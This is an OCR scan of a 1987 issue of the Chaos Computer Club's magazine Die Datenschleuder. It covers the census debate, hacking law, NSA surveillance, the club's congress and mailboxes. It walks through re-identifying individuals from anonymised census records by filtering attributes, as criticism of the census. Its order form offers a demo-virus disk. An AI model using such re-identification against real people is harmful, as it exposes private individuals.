fern sollen. Bekanntlich wurde - nach großen öffent¬ 
lichen Protesten - die ursprünglich für 1983 vorgese¬ 
hene Volkszählung durch ein Urteil des Bundesver¬ 
fassungsgerichtes gestoppt und den Verantwortlichen 
eindringlich klargemacht, zu welchen Bedingungen 
eine künftige Zählung machbarsei; 

Es sei zu "prüfen, ob eine Totalerhebung trotz einer 
inzwischen fortgeschrittenen Entwicklung der stati¬ 
stischen und sozialwissenschaftlichen Methoden 
noch verhältnismäßig ist'* (BVerfG’83, Seite 59). 
Darüber hinaus bedürfe es einer "möglichst frühzei¬ 
tigen, faktischen Anonymisierung, verbunden mit 
Vorkehrungen gegen eine Deanonymisierung" 


DS Saite Viazeen 


(BVerfG'83, S. 52/53). Interessant ist die Forderung 
des Gerichtes nach öffentlicher sachlicher Informa¬ 
tion auch über die Art der statistischen Datenverar¬ 
beitung, "da Abschottung statt Information zu Mi߬ 
trauen und mangelnder Kooperaiionsbereiischaft 
führen würde” (BVerfG'83, S. 54) 

Jetzt stellt sich natürlich die Frage, was der CCC mit 
der ganzen Sache zu tun hat, Nun. erstens interessiert 
die Redaktion von vornherein alles, was irgendwie 
nach Mißbrauch von Macht mittels des Werkzeugs 
Computer riecht. Zweitens ist so ein Urteil des Bun¬ 
desverfassungsgerichtes Ja ganz nett, aber wenn die 
Kontrollinstanzen fehlen, welche die Durchführung 
eines solchen Urteils überwachen, ist Jedermann auf¬ 
gerufen, das Seine dazuzutun, um Schaden von die¬ 
sem unseren Volke abzuwenden. Drittens haben wir 
im Rahmen des Chaos Communication Congress 
1986 Material erhalten, das uns geradezu verpflichtet, 
tätigzu werden. 

Am Institut für Informatik der Universität Hamburg 
wurden in den letzten Monaten umfangreiche Stu¬ 
dien durchgeführt, die zweifelsfrei belegen, daß die 
mit der Volkszählung 1987 gewonnen Daten, entge¬ 
gen der eindeutigen Forderung des Verfassungsge- 
richies, eben nicht Taktisch anonym’ sind, sondern 
sehr wohl, und recht einfach, eine Identifizierung des 
Dateninhabers ermöglichen. Den - wahrscheinlich 
neuen * Begriff des DATENINHABERS benutzen 
wir hier sehr bewußt, um deutlich zu machen, daß es 
in einer Informationsgesellschaft auch ein Grun¬ 
drecht auf informationeile Selbstbestimmung geben 
muß. Und das fängt eben damit an, daß jeder Einzel¬ 
ne selbst bestimmt, wer welche Daten über ihn sam¬ 
melt und benutzt. 

Die unter der Leitung von Professor Klaus Brunn- 
Stein durchgeführten Versuche zeigen erschreckend 
deutlich, mit welch einfachen Mitteln es möglich ist, 
aus den angeblich anonymisierten, d. h. nicht mehr 
personenbezogenen Daten wieder personalisierte 
Daten zu machen. Grundlage der Versuche war eine 
künstliche Volkszählungsdatei, die ausschließlich 
Daten enthält, wie sie bei der Zählung 1987 anfallen 
werden, ohne die momentan laufende Siammdatc- 
nerhebung bei den Hausbesitzern und Arbeitgebern 
auch nur annähernd einzubeziehen, so daß letztlich 
die Angaben, die jeder einzelne von uns macht, cs 
ermöglichen, wieder auf jeden Einzelnen zu schlie¬ 
ßen. 

Brunnsteins Studie zeigt einwandfrei, daß es mit 
einem einfachen Werkzeug, wie dem Datenbanksy¬ 
stem DBase III unter MS-Dos, möglich ist, mit weni¬ 
gen Filtervorgängen ganz konkrete Einzelpersonen 
aus einem Datenberg von 100 000 Datensätzen her¬ 
auszufischen. Bei 60 Millionen Datensätzen braucht 
man halt nur eine größere Festplatte und entspre¬ 
chend mehr Zeit... 

Wir wollen die Vorgehensweise zur Reanonymisie- 
rungvon Volkszählungsdaten anhand eines Beispiels 
deutlich machen: Ziclgruppe des Versuchs sind 46- 
jährige Männer aus der Bürobranche- Unser erster 
Schritt ist also konsequenterweise der, zuerst nach 
dem Geburtsjahr zu filtern. Es bleibt eine Datei mit 
915 Personen übrig, die 1940 nach dem Stichtag der 
Volkszählung geboren wurden. Diese Datei filtern 
wir nach dem Geschlecht und erhalten eine Datei mit 
443 Personen, die wir auf das Merkmal Erwerbstätig¬ 
keit prüfen. Übrig bleiben 386 männliche Erwerbstä¬ 
tige von 46 Jahren. Bürokräfte haben die SchlOssel- 
nummer78, also suchen wir jetzt danach und erhalten 
eine Datei, die nur noch 26 Personen enthält. Wir 


sollten uns dabei deutlich vor Augen halten, daß wir 
nur drei Merkmale brauchten, um aus 100 000 Daten¬ 
sätzen einige wenige herauszufischen. Der nächste 
Schritt besteht darin, die ’Wirtschaftsabteilung’ zu 
sondieren. Wir erhalten elf Datensätze, die wir auf 
das Merkmal Schulabschluß prüfen. Ergebnis; fünf 
Volks- bzw. Realschüler. Zusätzlich fragen wir, wer 
davon einen Berufsfachschulabschluß hat, übrig 
bleiben drei Kandidaten. 

Wir haben bislang erst sechs signifikante Merkmale 
untersucht, werden aber trotzdem hinterhältig und 
fragen uns: was wissen wir denn sonst so über die 
Drei? Über das Merkmal 'gemeinsamer Haushalt’ 
können wir weitere Schlüsse ziehen (Das Volkszäh¬ 
lungsgesetz 1987 schreibt ausdrücklich vor, daß "die 
Zusammenhänge zwischen Personen und Haushalt, 
Haushalt und Wohnung, Wohnung und Gebäude . .. 
festgehalten’* werden, was beim Gesetz zu Zählung 
’83 nicht der Fall war). Wir könnten nun also noch 
feststellen, daß Herr A ledig und religionslos ist und 
in einem Einzcihaushalt lebt. Damit ist er nun aber 
wirklich eindeutig reanonymisiert, denn B und C sind 
verheiratel und über ihre Ehepartner eher noch leich¬ 
ter reanonymisierbar. Zusammen mit der Tatsache, 
daß auch eine Information vorhanden ist, anhand de¬ 
rer der sogenannte Block des Dateninhabers fest¬ 
stellbar ist (Blöcke sind die kleinste Einheit von Da¬ 
tensatzmengen. Sie begrenzen die Datensätze von 
Personen, die in einer Straßenfront zwischen zwei 
Einmündungen von Nebenstraßen wohnen), wird 
nun leicht vorstellbar, warum Herr A spätestens 1989 
Werbung von einem Heiratsvermittler bekommt, 
während Herr B davon verschont bleibt. 

Der Forderung des Bundesverfassungsgerichts wird 
also mit der Volkszählung 1987 in keiner Weise 
Rechnung getragen. Faktische Anonymisierung be¬ 
deutet nunmal, daß eine Reanonymisierung nur mit 
unverhältnismäßig hohem Aufwand möglich sein 
darf. Schon durch die Art der erhobenen Daten wird 
eine Entscheidung, die unsere höchste verfassungs¬ 
mäßige Instanz getroffen hat, schlicht ignoriert. Ab¬ 
schließend noch einige Zitate aus der Studie, die wir 
unkommentiert lassen, da sie für sich sprechen: 

"Bei diesen Ergebnissen ist zu berücksichtigen, daß 
wesentliche Merkmale der Volkszählung, die eine 
Identifizierung noch erleichtern, etwa die Adresse 
des Arbeitgebers oder der Ausbildungsställe, in den 
Re-Identifizierungs-Versuchen nicht einmal benutzt 
wurden." 

"Erstens: Es gibt kaum Personen innerhalb des Da¬ 
tenbestandes. die nicht anhand der über sie gespei¬ 
cherten Merkmale re- identifizierbar wären. 

Zweitens: Mehr als die Hälfte aller Erwerbstätigen 
können schon mit wenigen Merkmalen ... re-identi- 
fiziert werden” . .da die Organisation der Statistik 
als interne Aufgabe der Exekutive angesehen wird, 
gibt es praktisch keine Kontrollinstanz.. 

"So sind die Präsidenten der Statistischen Ämter die 
letzten wahren, weil unkontrollierten Könige dieser 
Republik." 

Alle Zitate und das Re-Identifizierungsbeispiel 
stammen aus; "Mitteilung Nr. XX über Möglichkei¬ 
ten derRe-ldenlifikation von Personen aus Volkszäh- 
lungsdatcn" von Klaus Brunnstein, Hamburg; De¬ 
zember 1986. 

(Die Studie sowie Beispieldaten und die Re-Idenfi- 
kationsprogramme können über die DATEN- 
SCHLEUDER-Redaktion bezogen werden). 

goblin 


Dirk aus Berlin, der an der Diskussion 
Samstag Nacht auf dem CCCongress 
teilgenommen hat: die Moderatorin 
möchte Dich treffen. Bitte hinterlass 
Deine Tel-Nr. für Ingrid beim AL- 
Buero 861 4449. 



OLttS% 32 i* Bereitschafiipolizei - heute — 12/86 


Radio Bremen ist auf dem CCCongress’86 eine Vi- 
deocassette (Umatic) abhanden gekommen. Erken¬ 
nungsmerkmal: Kassette ist zu groß für VHS-Rekor- 
dcr. Mögliche Finder bitte während der öffentlichen 
Chaosdien.stzeiten Di-Do 12-15 unter 040-490 37 57 
melden. 

sffiHackersels 


(So lange der Vorrat reicht) 



CPM-Portable EPSON PX8, 54 KB, Microcassette, 
Display 80* 11, mit Akku und Garantie aus Sonder¬ 
posten DM 870,- für CCC-Mitglieder (notfalls 
gleichzeitig beantragen) 

Versand erfolgt als Wertpaket nach Eingang eines V- 
Schecks an den CCC, LS PX8, Schwenckestr. 85, 



IMPRESSUM 


^ic Sn<ciiSd)lciii>ct Numero 18 

Das wissenschaftliche Fachblatt für Datenreisende 

D-2000 Hamburg 20 Schwenckestrasse 85 

Geonet: Geol:Chaos-Team 
Btx : *655321# 

Herausgeber und ViSdPO: 

Herwart Holland-Moritz 

Milurbeiler (u.a.): R. Schnitzki, S. Wernery, A. 
Eichler, P. Frunck, H. Gruel, M. Kuehn, Esco, Andy 
M.-M., S. Stahl, padeluun. KS, jwi, D. Wititschnig, 
Poeironic; Rhein/Muin: Erich Eugelier sowie die 
iiiigenunnten Gclieimnistriigcr. 

(e) 1987 bei der Redtikiion und den Autoren 


Vieirarb-Kartüffeleigendruck ini Selbstverlug. 
Feliruiir 1987 - Made in Eile 


DS Saite FQmfzeen 





WIKG 


.. ^ 

2. WInschaflsKriminalitätsGesetz/.v^m 

(9^ 


&■] 


Da das 2.WirlschaftskriminaIitaisgcsclz (WIKG) zum 
ersten August’86 in Kraft trat, war es natürlich Ge- 
sprSchsgegenstand eines CCCongress-Workshops. Un¬ 
ter Leitung des BHP’lers Sponti wurde über die Aus¬ 
wirkungen und die Zukunft der Hacker diskutiert. Einig 
war man sich, daß NUI-Mißbrauch als "Täuschung im 
Datenverkehr'' strafbar, und es noch unklar ist, wo die 
Grenze zu ziehen ist zwischen Daten, welche legal ab- 
gerufen werden können, und denen, welche nicht legal 
abrulbar sind. 

Ist beispielsweise das Prompt, oder die Meldung, um 
wessen System cs sich handelt, bereits sicherheitsrcle- 
vant? Ist eine normale ID & Paßwort-Sperre bereits als 
"besonderer Schutz“ zu verstehen? Wichtig auch die 
Information, daß die ALTOS-Box jedes Einloggen und 
Ausloggen is Vorgang mit allen dabei anfallenden Da¬ 
ten protokolliert, bislang nur zur Ausmerzung von 
Software-Bugs, in Zukunft aber - mit Zustimmung der 
Firma ALTOS, der wohl nichts anderes übrig blieb ■ auf 
Veranlassung der Behörden, nachdem eine Ruckver¬ 
folgung stattfand, bei der sich jemand mit einer Leih- 
NUI bei ALTOS eingcloggt hatte. 

Um die Argumentation der Juristen und die Auswir¬ 
kungen und - legungen des 2.WIKG genauer kennen- 
zulemen, bitten wir jeden, der aufgrund des 2.WIKG in 
Schwierigkeiten gerät, sich bei uns zu melden, damit wir 
uns informieren können. 

Auf der Veranstaltunfg wurde auch die Auffassung ver¬ 
treten, daß die Hacker - als kleine Fische - Studien- und 
Übungsobjekte der LKA’s sind, die daran Erfahrungen 
sammeln für die Bekämpfung wirklicher Wirtschafts- 
ktimincllcr. Dcizciüger Stand der Dinge sei zwar, daß 
die meisten Ermitüungsbeamten bei Hausdurchsu¬ 
chungen wenig bis gar keine Ahnung hätten (so kam cs 
vor, daß leere Diskettenhüllen und -schachteln mitge¬ 
nommen wurden), daß aber die Beamten in den LKA's, 
die dann den Fall wciterbcarbciten, sehr wohl wissen, 
was sie tun. Man sollte also nicht auf deren Unkennmis 
setzen! 


Ls III 


Schon war’s 


Falschgeld in TEMPO 

DaßderCCC fürdie PARLAKOM-Studievom Bun¬ 
destag 38.000 DM erhalten habe, wie die Zeitschrift 
TEMPO es darstellte, ist leidereine Ente, Zur Sanie¬ 
rung der Clubfinanzen wäre die Summe durchaus 
hilfreich. Das Foto zu dem TEMPO-Artikel (ohne 
Unterschrift und Quelle) zeigt auch nicht die ISDN- 
Baustelle im Bundestag, sondern die bewährte Tele¬ 
fonzentrale des Chaos Communication Congress. 
Ferner ist richtigzustellen: Bei der Erarbeitung der 
Studie waren "nur" Leute aus dem CCC und dem 
Arbeitskreis Politisches Computern (APOC) beteiligt, 
die eine mögliche Computer-Wende der Grünen gei- 
sligmoralisch zu unterstützen versuchten. (Die Studie 
kann von derDS-Redakt/on bezogen werden). 

Js5 



Wiiis-cluifi.sspionaue 



British Telecom Is Watching You 


München (bhp/ds) - Vertrauliche geschäftliche In¬ 
formationen über europäische Induslriefirmen, er¬ 
langt durch Überwachungszentren der US-Amerika- 
nischen Streilkräfte in Europa, werden an konkurrie¬ 
rende Firmen in den USA übermittelt. Dies geht aus 
einem kürzlich veröffentlichen Buch zu diesem The¬ 
ma hervor. 

Der Verfasser, ein früherer Mitarbeiter der US-Luft- 
waffc, beschreibt darin, wie die Telekommunikation 
in mehreren Staaten der Europäischen Gemeinschaft 
überwacht wird und wie den US-Firmen fertig aufbe¬ 
reitete Informationen zugänglich gemacht werden. 
Dieser Teil der Überwachung überwiegt demnach bei 
weitem das Abhören des sowjetischen Miliiärfunk- 
Verkehrs, beschreibt Duncan Campbell in seinem 
Buch "The Unsinkable Aircraft Carrier" (der un¬ 
sinkbare Flugzeugträger: d. Übers.). Tom ütlerick, 
Abgeordneter des britischen Parlaments, beschuldig¬ 
te daraufhin «iie Vereinigten Staaten der "Wirt¬ 
schaftsspionage”. 

"Die wichtigste Station für die gegenseitige Sicher¬ 
heit in der Welt", so ein früherer Direktor der US Na¬ 
tional Security Agency, liegt in Menwith Hill in der 
Grafschaft Yorkshire, Großbritannien. Einige 10.000 
Telefonleitungen laufen dort zu der nahegelegenen 
Relaisstation der britischen Telefongesellschafl Bri¬ 
tish Telecom. Menwith Hill wird außerdem durch 
einen Hohlleiter versorgt, der bereits vor seiner Mo¬ 
dernisierung vor zwei Jahren eine Kapazität von 
32.000 Telefongesprächen gleichzeitig hatte. Gro߬ 
britannien ist einer der Hauptzugänge für Daienlei- 
tungen von Ost- und Westeuropa nach Afrika sowie 
Nord- und Südamerika. Die "Spezialität" der Station 
in Menwith ist das Anzapfen der fest gemieteten 
Standleilungen der europäischen Postverwaltungen. 
Nahezu der gesamte internationale Datenverkehr, 
Nachrichten, Telegramme und Telefongespräche von 
Firmen, staatlichen Institutionen, der Ober Großbri¬ 
tannien läuft, wird überwacht und ausgewertet. Die 
Mehrzahl der ausgewerteien Informationen werden 
an das Hauptquartier der NSA in Fort Meade, USA, 
weitergeleitet. 

Europas schwache Position in diesem Spiel wird 
noch zusätzlich verdeutlicht durch den Kommentar 
eines Amerikaners zu diesem Thema: "Nicht einmal 
wenn sie wollten, könnten die Verbündeten davor si¬ 
cher sein.‘Sie arbeiten alle mit Geräten, die sic von 
uns bezogen haben.” 

Aus: l'M, Informatfon Market, Ausgabe 46. Dcc. 1986- Feb. 1987 
Hrsg .; Commission of the European Communities. 
ds-Abdruck mit freundlicher Genehmigung der BHP. 


i^ic Sft(ett$tf)rcuber 


Hacking 0 ^, BiFu 

Bombenstimmung beim CCC’87 Bild und Funk auf dem CCC’86 


Ein Kameramann von Radio Bremen - er sucht hinter 
einem Elektrokaslen mühsam Deckung - steht im nie- 
selnden Schncematsch und betet: "LieberGott,mach 
bitte, daß sie hochgeht. Bitte, lieber Gott, ich werde 
mir auch einen zweiten TAZ-Aufkleber auf die Ka¬ 
mera kleben." 

Er ward nicht erhört. 

Mitten in der großen VIRUS-Diskussion während 
des CCCongresses hatte ein Unbekannter in REAL 
HACKING-Manier einen Virus eingcschleust: tele¬ 
fonisch gab er bekannt, daß jeden Augenblick eine 
BOMBE hochgehen würde. Von Anfang an der La¬ 
cher des Abends. Das Haus wurde aus juristischen 
Gründen mal eben kurz geräumt, das Chaos-Team 
durchkämmte mit einem Mienensuchroboter (20 cm 
hoch, ferngesteuert, bei Karstadt für 35 Mark) den 
zweiten Stock. Kleinere Aufregung bei der Räumak¬ 
tion gab es erst, als ein heimlicher Verbündeter des 
Anrufers - ebenfalls in REAL HACKING-Manier - 
ein bis zwei Luftballons explodieren ließ. - Was ha¬ 
ben wir uns alle erschrocken. 

Draußen im Regen gings dann ab. In ausreichendem 
Sicherheitsabstand von zwei Metern zum Eidelsted- 
ler Bürgerhaus begannen sich Trüppchen zu bilden 
und ihre Ansichten zur Virusfrage mit harten Banda¬ 
gen auszulauschen. Endlich war die trennende Stuhl- 
reihen- und Bühnensituation überwunden. Hier bra¬ 
chen die wohlhabenden Peripherie-Besitzer weinend 
zusammen: "Ich will keinen Virus auf meiner Fest¬ 
platte", während bescheidene Equipmentbesitzer 
triumphierten, daß der Virus ihrer Daiaseiie (schon 
wieder ein Riesenlacher) kaum etwas anhaben könne. 
Der Sicherheitsabstand zum Haus schrumpfte auf 50 
Zentimeter. Die Kripo hatte die Bombendrohung 
nicht ernst genommen, aber aus technischen Grün¬ 
den sollten erst noch einmal alle draußen warten. 
Kurz danach ging das Gerücht um, daß sich der 
Chaos-Helfer an der Lauisprecheranlage derart in 
Panik gcschrien hätte, daß er erst nach einigen kräfti¬ 
gen Ohrfeigen aufhörle, "Hilfe, Panik, alle rau.s!" zu 
schreien. Er hatte anschließend das gesündeste Aus¬ 
sehen von anen(rote Bäckchen...). 

Das Frösteln wurde langsam unangenehm und jeder 
versuchte, sich warmzureden. Zum lOOsten Mal wur¬ 
de der Satz des Tages zitiert: Ich bin nicht gegen Ge¬ 
setze, ich lasse sie nur außer acht. Darauf aufbauend, 
versuchten die Hintersten zuerst, in das warme Haus 
vorzudringen. Einige versuchten reinzukommen, in¬ 
dem sie sich (Real Hacking!) als Chaos-Dienst aus- 
gaben, halten aber nicht mit dem Real Serum (sprich 
ECHTEM Chaos-Dienstler) an der Tür gerechnet. 
Drin explodierte ein weiterer Luftballuun (sind wirk¬ 
lich wie Zeitbomben; sie finden ihre scharfe Ecke von 
alleine) und endlich gab Asterix die Tür wieder frei. 
Der Kameramann (ein besonders guter Mensch, weil 
er ja einen TAZ- Aufkleber auf der Kamera hatte) 
warein wenig traurig. Live- Explosionen lassen sich 
nämlich immer ganz prima an die Tagesschau ver¬ 
kaufen (je mehr Tote, desto besser...). Aber da er ja 
kein Zyniker ist, war er natürlich auch ein bißchen er¬ 
leichtert. 

Dies war ein Beitrag über Bombendrohungen. Und 
über REAL HACKING. Über Viren steht hiernichts. 
Weiterblädern. padeluun 

Siltcn3dr;fctt))ct: 


Wie in jedem Jahr auf dem Chaos Comunication 
Congress waren die Funkamateure wieder mit Bild 
und Funk vertreten. Schwerpunkte wie Packet Radio 
wurden in vorausgegangenen DATENSCHLEU¬ 
DERN ausführlich abgehandelt. 

Erstmals auf einem CCCongress war die Amateur¬ 
funkfernseh- Empfangsanlage (ATV-Anlage), die von 
DLIHK zur Verfügung gestellt worden war. Im we¬ 
sentlichen besteht .sowas aus einer Antenne für das 23 
cm-Band, einem Converter, der die Signale ins nor¬ 
male TV-Band umsetzt und einem Fernseher mit Ka- 
bcltuner. Mit dieser Mimik gelang es (trotz schlechter 
Antennenlage), ein verwertbares Farbbild vom ATV- 
Relais (Sendeleistung nur ca. 30 Watt) auf den Screen 
zu bekommen. Dazu war nichtmal ein Composter nö¬ 
tig! 

Wenn kein Amateur über das Relais arbeitet, sendet 
es automatisch einen aktuellen Ausschnitt vom Mc- 
teosat-2-Wetterbild im Wechsel mit einem Testbild 
odereinem Außenbild einer Kamera, die beim Relais 
angebracht Ist. 

Der eigentliche Witz des Relais liegt darin, daß auch 
ein Amateur, der selbst keine Bildübertragung ma¬ 
chen kann, sich mit einem 70 cm-Funkgerät auf den 
Tonträger aufschalten und so seine Kommentare zu 
den gezeigten Bildern abgeben kann. DCl XI war so 
frei, während der Veranstaltung als Ansprechpartner 
zu dienen und sozusagen auf Abruf eine Slalionsbe- 
schreibung (im Hackcenter herrscht gegen den Ka¬ 
belsalat richtig Ordnung) live einzuspielen oder Ama¬ 
teur-Videotapes zu senden. Krieg der Sterne zeigen 
ist zwar ohne weiteres machbar, aber nicht erlaubt 
(AFuG,(c) und so). 

Fürden CCC'87 hat DCIXI in Aussicht gestellt, ent¬ 
weder vom Congress live zu senden (so die Technik 
will), oder aber kurze Tapes von zu Hause einzuspie¬ 
len. Mal sehen ob’s klappt - frei nach dem Motto: 
Hier ist (DLO)CCC mit eigenem TV-Programm. 

Quartierisch 

Abenteuerurlaub in der Hafenstraße 

Zu Verwicklungen kam es bei der Organisation der 
Übernachtungsmöglichkeiten für den CCC’86. Da 
die ursprünglich vorgesehenen Räumlichkeiten des 
CVJM nicht mehr mietbar waren, wurde die städti¬ 
sche Wohnungsverwaltung SAGA angerufen. Das 
Telefonat, sinngemäß: "Der CCC brauchte für einige 
seiner vorwiegend jugendlichen Gäste Übernach¬ 
tungsplätze. Da die geplante Unterbringung nicht 
möglich ist, dachten wir daran, unseren Congres- 
sTeilnehmerlrnen ein anderes Stück Hamburg zu 
zeigen, eine Art Kurzabenteuerurlaub. In Ihren Häu¬ 
sern an der Hafenstraße stehen ja zumindest vier 
Wohnungen leer, die kürzlich geräumt wurden. Für 
die Dauer des Congresses würden wir gern ein paar 
unserer Gäste ln der Hafenstraße einquartieren. Da 
der Congress nur zwei Tage dauert, ist mit Räumung¬ 
sproblemen nicht zu rechnen." 

Die Absage bestand aus einer Unbewohnbarkeitser- 
kJärung, Darauniin wurde die Jugendherberge am 
Hafen angesprochen; ein Dank für die Unterstüt¬ 
zung, die den Gästen dort zuteil wurde. 

DS Saite SiflbzMfl 


OSSateSädizaen 






NetzWorkShop 

ln einer nächtlichen Sitzung trafen sich rund 30 Teil¬ 
nehmerinnen des CCC’86 zu einem Workshop, um 
Realisierungsmöglichkeiten alternativer Computer¬ 
technik und offener Netze zu besprechen. 

Als ein gelungenes Beispiel wurde die Berichterstat¬ 
tung der Bayrischen Hackerpost (B.H.P) gewertet. 
Die B.H.P. hatte bereits zwei Tage nach dem atoma¬ 
ren Katastrophe in Tschernobyl aktuelle Meßdaten 
über den Verstrahlungsgrad in Teilen der Bundesre¬ 
publik durch die Mailboxen-Szene geschickt. Dar¬ 
über hinaus wurden Hintergrundberichte angeboien, 
die die Bedeutung von Fachbegriffen und Meßgrö¬ 
ßen erläuterten. 

Praxis in der Erprobung 

Die Grenzen der elektronischen Kommunikation sa¬ 
hen die meisten Teilnehmer zunächst bei den relativ 
hohen Kommunikalionskosten. Eine Situation, die 
sich durch die Erhöhung der Benutzergebühren für 
Datex-Pnoch verschärfen wird. Einer der Teilnehmer 
fühlte sich unter einem "Haufen Fachidioten", die 
über Perspektiven sprechen, an denen er aus finan¬ 
ziellen Gründen nicht leilhaben kann. Auch vor die¬ 
sem Hintergrund wurde die Notwendigkeit betont, 
lokale Mailboxen, die von Privat betrieben werden, 
inhaltlich und strukturell zu unterstützen. 

Versuche in dieser Richtung werden derzeit mit der 
Hamburger C.L.I.N.C.H.-Box angegangen. Seit 
Sommer 1986 betreibt CCC- Mitglied Reinhard 
Schrutzki eine Mailbox, die trotz einiger Mängel für 
inhaltliche Arbeit geeignet erscheint. Die 
C.L.I.N.C.H.-Box dient derzeit den Redaktionen des 
Genethischen Informationsdienstes und der DA¬ 
TENSCHLEUDER als "hauseigener Nachrichten- 
Vermittlungsrechner”. Der Arbeitskreis für politische 
Computeranwendung (APOC) wickelt über diese 
Box Koordinierungsaufgaben ab und bietet tm Brett 
"Politik" Kurznachrichten zu aktuellen Entwicklun¬ 
gen aus dem Bereich alternative Computeranwen¬ 
dung an. 

Auf größeres Interesse stößt auch das Brett "Forum". 
Das für inhaltliche Diskussionen eingerichtete Brett 
bezieht sich derzeit überwiegend auf Themen aus 
dem Umfeld des CCC. Immerhin konnte an einem 
kleinen Beispiel demonstriert werden, was Mailbo¬ 
xen in der Praxis leisten können. Mitglieder der 
APOC hatten eine Diskussion über die Passfotos und 
Sicherheitskärtchen auf dem Kongress angezcttclt. 
Sie kritisierten, daß alle Besucher verpflichtet wur¬ 
den, solche an den Überwachungsstaat erinnernde 
Ausweisezu tragen. Sie schlugen vor, daß Besuchern 
lediglich ein Eintrittsstempel verpaßt wird, ver¬ 
gleichbar mit dem Verfahren "jeder mittelmäßigen 
Disko". Dieser Vorschlag wurde schließlich prakti¬ 
ziert. Der Prozess der Entscheidungsfindung, schrift¬ 
lich dokumentiert, konnte während des Kongresses 
nachgelesen werden. 

Elektronischer Schnellfick 

Wau Holland machte während des,Workshops deut¬ 
lich, daß sich durch die Schnelligkeit des Mediums 
bereits im kleinen Kreis neue Informations- und Ent- 
scheidungsclitcn herausbilden. 

Darüberhinaus brächten Mailboxen auch Informa- 
tionsüberflutung sowie Beschleunigung, Verflachung 
und Ver-Rechtlichung zwischenmenschlicher Bezie¬ 
hungen hin zum elektronischem Schnellfick. 

DS Saite Achzeen 



Wer deshalb oder anderen Gründen nicht am "elek¬ 
tronischen Vertrauenskreis" teilnehmen könne oder 
wolle, sei von Enlscheidungsprozcssen abgeschnit¬ 
ten. Kritisch würde diese Situation vor allem, wenn 
innerhalb der Boxen Diskussionen über Personen 
oder soziale Strukturen entstehen, ohne den direkt 
oder indirekt davon Betroffenen die bislang üblichen 
Möglichkeiten zur Reaktion zu gewähren. 

Die neue Qualität der Mail box sei unter anderem ihre 
Zwitter-Rolle als privates und gleichzeitig öffentli¬ 
ches Informationssystem. Zudem sind seien einer¬ 
seits so flüchtig wie Radiowellen, andererseits als 
Papierdokumente (Ausdrucke) archivierbar. 

Die Praxis zeige, wie wichtig es ist, die Konsequenzen 
verbreiteter Informationen zu bedenken. Es stelle 
sich immer wieder die Frage, welche Informationen, 
zu welchem Zweck, wann an wen wie und über wel¬ 
chen Informationsweg weilergegeben werden. 

Jürgen Wieckmann wertete die Aktivitäten auf der 
C.L.I.N.C.H.-Box als längst überfälligen Experimen¬ 
tierraum, der "uns endlich die Möglichkeit gibt, un¬ 
sere theoretischen Vorstellungen anhand der Praxis 
zu überprüfen und weiterzueniwickeln." 

Voraussetzungen für Perspektiven 

Mehrfach kam die Anregung, vergleichbar mit den 
Viodeoläden der 70er Jahre Computerläden aufzu- 
baucn, die eine praxisorientierte, alternative Compu¬ 
teranwendung erproben sollen. Aufgabe dieser Com- 
puterläden sei unter anderem, anwenderorientiertes 
Wissen zu vermitteln und Interessenten anhand refe¬ 
rierbarer Projekte dazu zu befähigen, das Medium 
zur Umsetzung eigener Interessen sachgerecht ein¬ 
schätzen zu können. Darüber hinaus gelle es, das 
Wissen über Informalionsvcrbreitung und Informa- 
tionsbeschaffung als kulturelle und politische Aufga¬ 
be zu begreifen. 

Die Computerläden hätten vor allem die Aufgabe, 
inhaltliche Arbeit bestehender Gruppen durch Com¬ 
putertechnik zu stärken und dabei auch die medien- 
spezifische Eigenheiten des Computers im positiven 
Sinne zu nutzen. So habe die Videoszene eine Video¬ 
kultur hervorgebracht, die neue Sehformen, Produk¬ 
tionsweisen und Bildgestaltungen hervorgebracht 
habe. Ein solcher Ansatz fehle der Computerszene 
bishervöllig. 

Im Februar wird es im Rahmen einer Zukunftswerk- 
statt ein Treffen interessierter Kreise geben (siehe 
Termine an anderer Stelle im Heft), die ergebniso- 
rientierte Konzepte zu solchen Ideen erarbeiten und 
vorstellen wollen. Diese Konzepte sollen auch 
Grundlage sein, um Anlauffinanzierungen durch die 
öffentliche Hand zu beantragen. jwi/(ls5) 

Sdtcn^ifjrcubcr 


Beslelltetzen IBei Bedarf abbeissen und ausgefültt einschicken ( am besten an uns)) ^ 
Jaiajajaaa- ich möchte versuchen, die folgenden Sachen von Euch zu bekommen: {. 


20,00 DM Einmalige Aufnahmegebühr für den Chaos Computer Club 
60,00 DM Mitgliedschaft im CCC für ein Jahr für Schüler, Söjdenten und ähnliches 
120.00 DM Mitgliedschaft im CCC für ein Jahr für Normaluser 
230 00 DM Ich will mehr: fördernde Mitgliedschaft im CCC für ein Jahr 

2 50 DM Probeexemolar der DATENSCHLEUDER, frankierten Rückumschlag beilegen 

An //ff 30.00 OM Sozialabo der Datenschleuder ftir ein Jahr (Schüler, ptpapo) 

ßO OD DM Standardabo der Datenschleuder für ein Jahr 

yji 120,00 DM Ich will mehr (bezahlen); Förderabo der Datenschleuder für ein Jahr 

3.33 DM 10 Aufbacker’Kabelsalat ist gesund* , Standardausführung 

3 33 DM 1 Din A4 - Bogen Aufbacker 'Achtung Abhörgefahr', ungeschnitten, postgelb 

25.00 DM Infopaket 1: Computerviren I MS-Dos Disk 170k mit Demovirus und 
munteren 10Okß Dokumentatiön zum Thema Viren 
25.00 DM Infopaket 2 : Volkszählung & Reidentifikation 2 MS-Dos Disks 1 ?0k mit 
Beispieldaten (künstliche Bürger). DBaselll - Programmen zur Reidentifi- 
_ kation und 17 Seifen Gebrauchsanweisung 

?.?? DM Porto. Verpackung, Trinkgeld, Bussgeld, Spenden etc , 



Die Kohle liegt bei als: Briefmarken <= 0.80 DM V-Scheck Blankoscheck (lechz) Bar 

i ^uS'etfendes ma/ideren. Mchtzuüe^endes Zöschen, oder senff^'äs/ 

Nur für zukünftige Mitglieder: 

Ich zahle meine Mitgliedsbeiträge jährlich halbjährlich vierteljahriich styndlich 
^undzwar bar per V-Scheck Überweisung 

Ihr dürft abbuchen {Einzugsetiaubnis liegt bei) 

Überweisungen bitte an : Postgrrosamt Hamburg, 59 90 90 - 201 . Chaos Computer Club e.V.. Hamburg 

Nur für zukünftige Maiiboxbenutzer: 

Ich will Benutzer der CUNCH - Box werden (5.00 DM, bzw 2.00 DM / Monat, keine Zeitgebühren) | | 

Ich will Benutzerder INFEX - Box werden (8.00 DM/Monat Mindestnutzung + Zeitgebühr) I I 

{Gewünschtes S!>-Ftem markieren, itnteriagtn werden zegesandt) 

Personenbezogene Daten ab hier eintragen: 





{Angaten auch machen, wenn AdresskJeter tetgHüst, fai/s Adresskieber/ehH: i.OODMBussgeid) 


Ort.Datum,Unterschri1t | 

Clisos Computer Club e.V. 
